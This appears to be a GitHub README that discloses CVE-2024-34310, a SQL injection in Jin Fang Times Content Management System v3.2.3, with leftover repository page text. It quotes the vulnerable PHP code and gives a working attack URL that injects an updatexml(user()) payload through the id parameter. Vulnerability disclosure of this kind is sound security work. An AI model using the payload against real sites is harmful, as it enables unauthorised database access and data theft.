CVE-2024-34310

[Suggested description] Jin Fang Times Content Management System v3.2.3 was discovered to contain a SQL injection vulnerability via the id parameter.

[Vulnerability Type] SQL Injection

[Vendor of Product] https://www.bjjfsd.com/

[Affected Product Code Base] Jin Fang times content management system - 3.2.3

[Affected Component] public function data_show($id = 0) {
if (empty($id)) {

    $this->redirect('index');

}
$info = M('News')->find($id);

[Attack Type] Remote

[Impact Code execution] true

[Impact Information Disclosure] true

[Attack Vectors] m=Wap&c=Index&a=data_show&id[where]=1%20or%20updatexml(0,user(),0)

[Discoverer] yishan

[Reference] http://jin.com https://www.bjjfsd.com/

Use CVE-2024-34310.

Name		Name	Last commit message	Last commit date
Latest commit History 2 Commits
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2024-34310

About

Releases

Packages

3309899621/CVE-2024-34310

Folders and files

Latest commit

History

Repository files navigation

CVE-2024-34310

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages